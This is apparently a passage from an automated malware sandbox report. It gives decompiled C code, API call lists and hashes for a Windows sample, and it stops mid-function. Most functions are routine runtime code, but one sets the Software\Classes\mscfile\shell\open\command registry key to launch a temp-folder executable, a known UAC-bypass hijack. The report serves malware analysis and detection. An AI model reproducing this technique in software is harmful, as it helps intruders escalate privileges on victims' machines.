                                                                                                • CreateFileW.KERNELBASE(00405F06,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00000004,00000000,00000000,?,00418461,00000000,00000000), ref: 00418376
                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00418461,00000000,00000000,00000000,00000004), ref: 00418392
                                                                                                • CloseHandle.KERNEL32(00000000,?,00418461,00000000,00000000,00000000,00000004), ref: 0041839E
                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000000,00405F06,00000000,?,00418461,00000000,00000000,00000000,00000004), ref: 004183B0
                                                                                                • CloseHandle.KERNEL32(00000000,?,00418461,00000000,00000000,00000000,00000004), ref: 004183BD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseHandle$CreatePointerWrite
                                                                                                • String ID:
                                                                                                • API String ID: 1852769593-0
                                                                                                • Opcode ID: 7593ea156b25f21f6d9a2ab5bb20b7651b5366da688949f3836ca596567157fb
                                                                                                • Instruction ID: d74f83a6c6e0abcf35dadfeb7d7d7c2f5a7923569ffe6f1a5da60d4ad132d066
                                                                                                • Opcode Fuzzy Hash: 7593ea156b25f21f6d9a2ab5bb20b7651b5366da688949f3836ca596567157fb
                                                                                                • Instruction Fuzzy Hash: FF11C17120011CBFDB104F689C89EEB376CEB46765F18422EFD25DA280DA36CE815668
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 94%
                                                                                                			E0044882A() {
                                                                                                				int _v8;
                                                                                                				void* __ecx;
                                                                                                				void* _t6;
                                                                                                				int _t7;
                                                                                                				char* _t8;
                                                                                                				char* _t13;
                                                                                                				int _t17;
                                                                                                				void* _t19;
                                                                                                				char* _t25;
                                                                                                				WCHAR* _t27;
                                                                                                
                                                                                                				_t27 = GetEnvironmentStringsW();
                                                                                                				if(_t27 == 0) {
                                                                                                					L7:
                                                                                                					_t13 = 0;
                                                                                                				} else {
                                                                                                					_t6 = E004487F3(_t27);
                                                                                                					_pop(_t19);
                                                                                                					_t17 = _t6 - _t27 >> 1;
                                                                                                					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
                                                                                                					_v8 = _t7;
                                                                                                					if(_t7 == 0) {
                                                                                                						goto L7;
                                                                                                					} else {
                                                                                                						_t8 = E00440C6C(_t19, _t7); // executed
                                                                                                						_t25 = _t8;
                                                                                                						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
                                                                                                							_t13 = 0;
                                                                                                						} else {
                                                                                                							_t13 = _t25;
                                                                                                							_t25 = 0;
                                                                                                						}
                                                                                                						E004414D5(_t25);
                                                                                                					}
                                                                                                				}
                                                                                                				if(_t27 != 0) {
                                                                                                					FreeEnvironmentStringsW(_t27);
                                                                                                				}
                                                                                                				return _t13;
                                                                                                			}














                                                                                                APIs
                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 00448833
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00448856
                                                                                                  • Part of subcall function 00440C6C: RtlAllocateHeap.NTDLL(00000000,?,?,?,0042FF99,?,?,00401696,?,?,?,?,?), ref: 00440C9E
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044887C
                                                                                                • _free.LIBCMT ref: 0044888F
                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044889E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                • String ID:
                                                                                                • API String ID: 336800556-0
                                                                                                • Opcode ID: 5aacbd926c009eb0687749a1ecdd7c1a74e4dbaf76035de02b4ab6db49c37299
                                                                                                • Instruction ID: ad69adcc79b35a3c1bf735b9d9c9e89d350c3c6e8865b9b0f8ec16f2c04a0f93
                                                                                                • Opcode Fuzzy Hash: 5aacbd926c009eb0687749a1ecdd7c1a74e4dbaf76035de02b4ab6db49c37299
                                                                                                • Instruction Fuzzy Hash: FB01B1626017147F37212AAB5C8CC7F7A6DDEC2BA5755022EFA04C7201EE688D4181B8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 77%
                                                                                                			E00410B7B(void* __ecx, short* __edx, short* _a4, char _a8, int _a32) {
                                                                                                				void* _v8;
                                                                                                				long _t14;
                                                                                                				signed int _t17;
                                                                                                				long _t20;
                                                                                                				signed int _t22;
                                                                                                				signed int _t23;
                                                                                                
                                                                                                				_push(__ecx);
                                                                                                				_push(_t22);
                                                                                                				_t14 = RegCreateKeyW(__ecx, __edx,  &_v8); // executed
                                                                                                				if(_t14 != 0) {
                                                                                                					_t23 = 0;
                                                                                                				} else {
                                                                                                					_t17 = E0040247B();
                                                                                                					_t20 = RegSetValueExW(_v8, _a4, 0, _a32, E00401EDD( &_a8), 2 + _t17 * 2); // executed
                                                                                                					RegCloseKey(_v8);
                                                                                                					_t23 = _t22 & 0xffffff00 | _t20 == 0x00000000;
                                                                                                				}
                                                                                                				E00401EE2();
                                                                                                				return _t23;
                                                                                                			}










                                                                                                APIs
                                                                                                • RegCreateKeyW.ADVAPI32(80000001,Software\Classes\mscfile\shell\open\command,?), ref: 00410B86
                                                                                                • RegSetValueExW.KERNELBASE(?,0046079C,00000000,00000000,00000000,00000000,0046079C,?,80000001,?,004061BD,0046079C,C:\Users\user\AppData\Local\Temp\rem9090sta.exe), ref: 00410BB5
                                                                                                • RegCloseKey.ADVAPI32(?,?,80000001,?,004061BD,0046079C,C:\Users\user\AppData\Local\Temp\rem9090sta.exe), ref: 00410BC0
                                                                                                Strings
                                                                                                • Software\Classes\mscfile\shell\open\command, xrefs: 00410B84
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateValue
                                                                                                • String ID: Software\Classes\mscfile\shell\open\command
                                                                                                • API String ID: 1818849710-505396733
                                                                                                • Opcode ID: 6644561fe13a0524ec6befa8fe3b83b4386d3b958b6a850545e619c8f7894b61
                                                                                                • Instruction ID: 82f14cb9e3031a01d822d6d81441f6af2dedc3ed787e11c635c14dc79d111203
                                                                                                • Opcode Fuzzy Hash: 6644561fe13a0524ec6befa8fe3b83b4386d3b958b6a850545e619c8f7894b61
                                                                                                • Instruction Fuzzy Hash: 02F0AF3140020CBBCF009FA1ED05EEE376CFB44759F10412AB905AA1A1E6359E44DB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 92%
                                                                                                			E0043E2C1(void* __ebx, void* __ecx) {
                                                                                                				void* _t2;
                                                                                                				intOrPtr _t3;
                                                                                                				signed int _t15;
                                                                                                				signed int _t16;
                                                                                                
                                                                                                				if( *0x46d4d0 == 0) {
                                                                                                					_push(_t15);
                                                                                                					E00448529(__ecx); // executed
                                                                                                					_t2 = E0044882A(); // executed
                                                                                                					_t19 = _t2;
                                                                                                					if(_t2 != 0) {
                                                                                                						_t3 = E0043E36E(__ebx, _t19);
                                                                                                						if(_t3 != 0) {
                                                                                                							 *0x46d4dc = _t3;
                                                                                                							E0043750E(0x46d4d0, _t3);
                                                                                                							_t16 = 0;
                                                                                                						} else {
                                                                                                							_t16 = _t15 | 0xffffffff;
                                                                                                						}
                                                                                                						E004414D5(0);
                                                                                                					} else {
                                                                                                						_t16 = _t15 | 0xffffffff;
                                                                                                					}
                                                                                                					E004414D5(_t19);
                                                                                                					return _t16;
                                                                                                				} else {
                                                                                                					return 0;
                                                                                                				}
                                                                                                			}








                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID: @e
                                                                                                • API String ID: 269201875-2994471477
                                                                                                • Opcode ID: 418404c469e31834df15ed37849df1d11274e996d35f1cd43b37576d47145671
                                                                                                • Instruction ID: f9ed7ad6c89ae7cb51d312edb681146ff5a8de6a00b71520938e44ab78725240
                                                                                                • Opcode Fuzzy Hash: 418404c469e31834df15ed37849df1d11274e996d35f1cd43b37576d47145671
                                                                                                • Instruction Fuzzy Hash: FDE06D22E0752061E626363B6C0976F05599BC9339F21526FF8268B6D1EFBC8C4741AF
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E004108B4(char* __edx, char* _a4, char* _a8) {
                                                                                                				void* _v8;
                                                                                                				int _v12;
                                                                                                				int _v16;
                                                                                                				int _t12;
                                                                                                				long _t14;
                                                                                                				long _t18;
                                                                                                
                                                                                                				_t12 = 4;
                                                                                                				_v12 = _t12;
                                                                                                				_v16 = _t12;
                                                                                                				_t14 = RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v8); // executed
                                                                                                				if(_t14 != 0) {
                                                                                                					return 0;
                                                                                                				}
                                                                                                				_t18 = RegQueryValueExA(_v8, _a4, 0,  &_v16, _a8,  &_v12);
                                                                                                				return RegCloseKey(_v8) & 0xffffff00 | _t18 == 0x00000000;
                                                                                                			}










                                                                                                APIs
                                                                                                • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004108D4
                                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000), ref: 004108F2
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004108FD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID:
                                                                                                • API String ID: 3677997916-0
                                                                                                • Opcode ID: 649c45392d5ae1558f032711ae3bb036d6acd2cd9c947e5aeeecad681845a9bc
                                                                                                • Instruction ID: 63855dda8fb632bf1beee0559157bc493b1c2f3c72ca86b31d45f6512f352132
                                                                                                • Opcode Fuzzy Hash: 649c45392d5ae1558f032711ae3bb036d6acd2cd9c947e5aeeecad681845a9bc
                                                                                                • Instruction Fuzzy Hash: 64F0127690020CBFDF109FE09C45FED7B7CEB44B15F104065BA05E6151D2759A94DB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 66%
                                                                                                			E00410911(void* __ecx, void* __edx, char* _a4, char* _a8) {
                                                                                                				void* _v8;
                                                                                                				int _v12;
                                                                                                				char _v1036;
                                                                                                				long _t11;
                                                                                                				void* _t19;
                                                                                                				void* _t23;
                                                                                                
                                                                                                				_v12 = 0x400;
                                                                                                				_t23 = __ecx;
                                                                                                				_t11 = RegOpenKeyExA(__edx, _a4, 0, 0x20019,  &_v8); // executed
                                                                                                				if(_t11 != 0) {
                                                                                                					_push(0x460734);
                                                                                                				} else {
                                                                                                					RegQueryValueExA(_v8, _a8, 0, 0,  &_v1036,  &_v12); // executed
                                                                                                					RegCloseKey(_v8);
                                                                                                					_push( &_v1036);
                                                                                                				}
                                                                                                				E00402076(_t19, _t23);
                                                                                                				return _t23;
                                                                                                			}










                                                                                                APIs
                                                                                                • RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00410933
                                                                                                • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00410952
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0041095B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID:
                                                                                                • API String ID: 3677997916-0
                                                                                                • Opcode ID: ff4d1dda1717e8bfa00f59fc3920b61803ba0fd0455c11c174dae0c8643a1a4d
                                                                                                • Instruction ID: 05d1a431d63dd8663231bebc481d82b76f22a5c318b4534d80a30b1479a232ce
                                                                                                • Opcode Fuzzy Hash: ff4d1dda1717e8bfa00f59fc3920b61803ba0fd0455c11c174dae0c8643a1a4d
                                                                                                • Instruction Fuzzy Hash: C6F0C2B560020CBBEB109B80DD05FED777CEB44B05F2040A6BB05B6191D6B5AE85ABA8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 64%
                                                                                                			E00401646(signed int _a4, signed int _a8, char _a12) {
                                                                                                				intOrPtr _v16;
                                                                                                				char _v20;
                                                                                                				intOrPtr _v32;
                                                                                                				char _v36;
                                                                                                				char _v52;
                                                                                                				void* __esi;
                                                                                                				signed int _t21;
                                                                                                				signed int _t22;
                                                                                                				signed int _t24;
                                                                                                				intOrPtr _t40;
                                                                                                				signed int _t42;
                                                                                                				signed int _t43;
                                                                                                				signed int _t45;
                                                                                                				char* _t48;
                                                                                                				signed int _t53;
                                                                                                				char* _t55;
                                                                                                				void* _t57;
                                                                                                				void* _t58;
                                                                                                				void* _t61;
                                                                                                				void* _t63;
                                                                                                				void* _t64;
                                                                                                				void* _t67;
                                                                                                				void* _t68;
                                                                                                
                                                                                                				_t61 = _t67;
                                                                                                				_t42 = _a4;
                                                                                                				if(_t42 != 0) {
                                                                                                					_t22 = _t21 | 0xffffffff;
                                                                                                					_t53 = _t22 % _a8;
                                                                                                					__eflags = _t22 / _a8 - _t42;
                                                                                                					if(_t22 / _a8 >= _t42) {
                                                                                                						_t43 = _t42 * _a8;
                                                                                                						__eflags = _a12;
                                                                                                						if(__eflags == 0) {
                                                                                                							L8:
                                                                                                							_t24 = E0042FF6D(_t53, _t57, __eflags, _t43); // executed
                                                                                                							_t45 = _t24;
                                                                                                							goto L9;
                                                                                                						} else {
                                                                                                							__eflags = _t43 - 0x1000;
                                                                                                							if(__eflags < 0) {
                                                                                                								goto L8;
                                                                                                							} else {
                                                                                                								_t26 = _t43 + 0x23;
                                                                                                								__eflags = _t43 + 0x23 - _t43;
                                                                                                								if(__eflags <= 0) {
                                                                                                									goto L3;
                                                                                                								} else {
                                                                                                									_t40 = E0042FF6D(_t53, _t57, __eflags, _t26);
                                                                                                									_t11 = _t40 + 0x23; // 0x23
                                                                                                									_t45 = _t11 & 0xffffffe0;
                                                                                                									 *((intOrPtr*)(_t45 - 4)) = _t40;
                                                                                                									L9:
                                                                                                									return _t45;
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                					} else {
                                                                                                						L3:
                                                                                                						_push(_t61);
                                                                                                						_t63 = _t67;
                                                                                                						_t68 = _t67 - 0xc;
                                                                                                						E00430684( &_v20);
                                                                                                						E00432EDA( &_v20, 0x468dbc);
                                                                                                						asm("int3");
                                                                                                						_push(_t63);
                                                                                                						_t64 = _t68;
                                                                                                						E00430C86( &_v36, _v16);
                                                                                                						E00432EDA( &_v36, 0x468e4c);
                                                                                                						asm("int3");
                                                                                                						_push(_t64);
                                                                                                						_t48 =  &_v52;
                                                                                                						E00430CDD(_t48, _v32);
                                                                                                						E00432EDA( &_v52, 0x468e88);
                                                                                                						asm("int3");
                                                                                                						_t55 = _t48;
                                                                                                						__eflags = 1;
                                                                                                						asm("lock xadd [0x46c024], eax");
                                                                                                						if(1 == 0) {
                                                                                                							_push(_t57);
                                                                                                							_t58 = 0x46d050;
                                                                                                							do {
                                                                                                								E00431635(_t58);
                                                                                                								_t58 = _t58 + 0x18;
                                                                                                								__eflags = _t58 - 0x46d110;
                                                                                                							} while (_t58 < 0x46d110);
                                                                                                						}
                                                                                                						return _t55;
                                                                                                					}
                                                                                                				} else {
                                                                                                					return 0;
                                                                                                				}
                                                                                                			}

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 25837c2cbf3204a2a259ad223c0ab53f0258c59322690b9cce00b5bc75b07f48
                                                                                                • Instruction ID: 2d1efc8c66fadbda5e17c089614162597299918c7674b8c1b7db7f5a2b4967d3
                                                                                                • Opcode Fuzzy Hash: 25837c2cbf3204a2a259ad223c0ab53f0258c59322690b9cce00b5bc75b07f48
                                                                                                • Instruction Fuzzy Hash: 06F0BE722142085BDB0C9E349D51A7E379D5B05368B684B3FF02FDA2E1DB3AE985864C
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00402CFF(intOrPtr __ecx, void* __edx, void* __eflags) {
                                                                                                				void* __ebx;
                                                                                                				unsigned int _t29;
                                                                                                				signed int _t34;
                                                                                                				void* _t38;
                                                                                                				void* _t42;
                                                                                                				void* _t43;
                                                                                                				signed int _t49;
                                                                                                				intOrPtr _t52;
                                                                                                				unsigned int _t55;
                                                                                                				unsigned int _t71;
                                                                                                				signed int _t77;
                                                                                                				void* _t79;
                                                                                                				void* _t81;
                                                                                                
                                                                                                				_t52 = __ecx;
                                                                                                				E00452248(E004537A4, _t79);
                                                                                                				 *((intOrPtr*)(_t79 - 0x10)) = _t81 - 0x10;
                                                                                                				_t73 = _t52;
                                                                                                				 *((intOrPtr*)(_t79 - 0x18)) = _t52;
                                                                                                				_t77 =  *(_t79 + 8) | 0x0000000f;
                                                                                                				_t49 = E00402E3E(_t52);
                                                                                                				if(_t49 >= _t77) {
                                                                                                					_t29 =  *(E004027A7());
                                                                                                					 *(_t79 - 0x1c) = _t29;
                                                                                                					_t55 = _t29 >> 1;
                                                                                                					 *(_t79 - 0x14) = 3;
                                                                                                					if(_t55 > _t77 /  *(_t79 - 0x14)) {
                                                                                                						_t71 =  *(_t79 - 0x1c);
                                                                                                						_t77 = _t55 + _t71;
                                                                                                						if(_t71 > _t49 - _t55) {
                                                                                                							_t77 = _t49;
                                                                                                						}
                                                                                                					}
                                                                                                				} else {
                                                                                                					_t77 =  *(_t79 + 8);
                                                                                                				}
                                                                                                				 *(_t79 - 4) =  *(_t79 - 4) & 0x00000000;
                                                                                                				_t17 = _t77 + 1; // 0x1
                                                                                                				E00402200(_t73);
                                                                                                				_t34 = E00402EB2(_t17); // executed
                                                                                                				 *(_t79 - 0x14) = _t34;
                                                                                                				 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
                                                                                                				_t50 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                				if( *((intOrPtr*)(_t79 + 0xc)) != 0) {
                                                                                                					_t43 = E0040223A(_t73);
                                                                                                					E004015F7(E00403121( *(_t79 - 0x14)), _t43, _t50);
                                                                                                				}
                                                                                                				E004023CA(_t50, _t73, 1, 0);
                                                                                                				_t38 = E00403121(E0040212E(_t73));
                                                                                                				E00403199(E00402200(_t73), _t38, _t79 - 0x14);
                                                                                                				 *(E004027A7()) = _t77;
                                                                                                				_t42 = E00402982(_t50);
                                                                                                				 *[fs:0x0] =  *((intOrPtr*)(_t79 - 0xc));
                                                                                                				return _t42;
                                                                                                			}

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: H_prolog
                                                                                                • String ID:
                                                                                                • API String ID: 3519838083-0
                                                                                                • Opcode ID: 0c29e88675947b247337350fecebc8e139c70f3754e2f597b147425d88c782ff
                                                                                                • Instruction ID: 3dd5ab6fcd1e10ff401d729f84c4ff9e1b7a33febeac1901b83a7dd24140b9ff
                                                                                                • Opcode Fuzzy Hash: 0c29e88675947b247337350fecebc8e139c70f3754e2f597b147425d88c782ff
                                                                                                • Instruction Fuzzy Hash: 53219371B001055BCB05FFA68A8A6BEB6AAAF84315F10403FF415BB2C2DBBC5E019795
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 91%
                                                                                                			E004495A4(void* __esi, void* __eflags) {
                                                                                                				intOrPtr _v12;
                                                                                                				void* __ecx;
                                                                                                				char _t16;
                                                                                                				void* _t17;
                                                                                                				void* _t26;
                                                                                                				void* _t28;
                                                                                                				void* _t30;
                                                                                                				char _t31;
                                                                                                				void* _t33;
                                                                                                				intOrPtr* _t35;
                                                                                                
                                                                                                				_push(_t26);
                                                                                                				_push(_t26);
                                                                                                				_t16 = E00440628(_t26, 0x40, 0x30); // executed
                                                                                                				_t31 = _t16;
                                                                                                				_v12 = _t31;
                                                                                                				_t28 = _t30;
                                                                                                				if(_t31 != 0) {
                                                                                                					_t2 = _t31 + 0xc00; // 0xc00
                                                                                                					_t17 = _t2;
                                                                                                					__eflags = _t31 - _t17;
                                                                                                					if(__eflags != 0) {
                                                                                                						_t3 = _t31 + 0x20; // 0x20
                                                                                                						_t35 = _t3;
                                                                                                						_t33 = _t17;
                                                                                                						do {
                                                                                                							_t4 = _t35 - 0x20; // 0x0
                                                                                                							E004437D7(_t28, _t35, __eflags, _t4, 0xfa0, 0);
                                                                                                							 *(_t35 - 8) =  *(_t35 - 8) | 0xffffffff;
                                                                                                							 *_t35 = 0;
                                                                                                							_t35 = _t35 + 0x30;
                                                                                                							 *((intOrPtr*)(_t35 - 0x2c)) = 0;
                                                                                                							 *((intOrPtr*)(_t35 - 0x28)) = 0xa0a0000;
                                                                                                							 *((char*)(_t35 - 0x24)) = 0xa;
                                                                                                							 *(_t35 - 0x23) =  *(_t35 - 0x23) & 0x000000f8;
                                                                                                							 *((char*)(_t35 - 0x22)) = 0;
                                                                                                							__eflags = _t35 - 0x20 - _t33;
                                                                                                						} while (__eflags != 0);
                                                                                                						_t31 = _v12;
                                                                                                					}
                                                                                                				} else {
                                                                                                					_t31 = 0;
                                                                                                				}
                                                                                                				E004414D5(0);
                                                                                                				return _t31;
                                                                                                			}














                                                                                                APIs
                                                                                                  • Part of subcall function 00440628: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044301D,00000001,00000364,?,?,?,00438937,00440CAF,?,?,0042FF99,?), ref: 00440669
                                                                                                • _free.LIBCMT ref: 00449610
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap_free
                                                                                                • String ID:
                                                                                                • API String ID: 614378929-0
                                                                                                • Opcode ID: 3172957cdbbe993f15e52bde747a3cb1a13adf3dac6d71025a6804c7a1a525b1
                                                                                                • Instruction ID: ec0a6b97cc5370c94aaac90878acb0e244b80713cb422e23bfe0f730aee142eb
                                                                                                • Opcode Fuzzy Hash: 3172957cdbbe993f15e52bde747a3cb1a13adf3dac6d71025a6804c7a1a525b1
                                                                                                • Instruction Fuzzy Hash: 8F01D6722003456BF721CF66988195BFBE9EBC5370F25062EE58497680EA34AD45C768
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 95%
                                                                                                			E00440628(void* __ecx, signed int _a4, signed int _a8) {
                                                                                                				void* __esi;
                                                                                                				void* _t8;
                                                                                                				void* _t12;
                                                                                                				signed int _t13;
                                                                                                				void* _t15;
                                                                                                				signed int _t18;
                                                                                                				long _t19;
                                                                                                
                                                                                                				_t15 = __ecx;
                                                                                                				_t18 = _a4;
                                                                                                				if(_t18 == 0) {
                                                                                                					L2:
                                                                                                					_t19 = _t18 * _a8;
                                                                                                					if(_t19 == 0) {
                                                                                                						_t19 = _t19 + 1;
                                                                                                					}
                                                                                                					while(1) {
                                                                                                						_t8 = RtlAllocateHeap( *0x46da48, 8, _t19); // executed
                                                                                                						if(_t8 != 0) {
                                                                                                							break;
                                                                                                						}
                                                                                                						__eflags = E0044007A();
                                                                                                						if(__eflags == 0) {
                                                                                                							L8:
                                                                                                							 *((intOrPtr*)(E00438932())) = 0xc;
                                                                                                							__eflags = 0;
                                                                                                							return 0;
                                                                                                						}
                                                                                                						_t12 = E0043DAF9(_t15, _t19, __eflags, _t19);
                                                                                                						_pop(_t15);
                                                                                                						__eflags = _t12;
                                                                                                						if(_t12 == 0) {
                                                                                                							goto L8;
                                                                                                						}
                                                                                                					}
                                                                                                					return _t8;
                                                                                                				}
                                                                                                				_t13 = 0xffffffe0;
                                                                                                				if(_t13 / _t18 < _a8) {
                                                                                                					goto L8;
                                                                                                				}
                                                                                                				goto L2;
                                                                                                			}











                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044301D,00000001,00000364,?,?,?,00438937,00440CAF,?,?,0042FF99,?), ref: 00440669
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: 27a20f07b0b9ea4f322eb06bd30b8c404bd0c6a2f8702a4b3de09eb56e68ad74
                                                                                                • Instruction ID: f1932c8e73fcd017ea8e96c946db2f3894439211089cf3beed1ca8db1b1f566c
                                                                                                • Opcode Fuzzy Hash: 27a20f07b0b9ea4f322eb06bd30b8c404bd0c6a2f8702a4b3de09eb56e68ad74
                                                                                                • Instruction Fuzzy Hash: 1AF0593160422477BB212A72AC05B1B3748AFC1774F168027FE06DB280CBBCD83146ED
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 94%
                                                                                                			E00440C6C(void* __ecx, long _a4) {
                                                                                                				void* __esi;
                                                                                                				void* _t4;
                                                                                                				void* _t6;
                                                                                                				void* _t7;
                                                                                                				long _t8;
                                                                                                
                                                                                                				_t7 = __ecx;
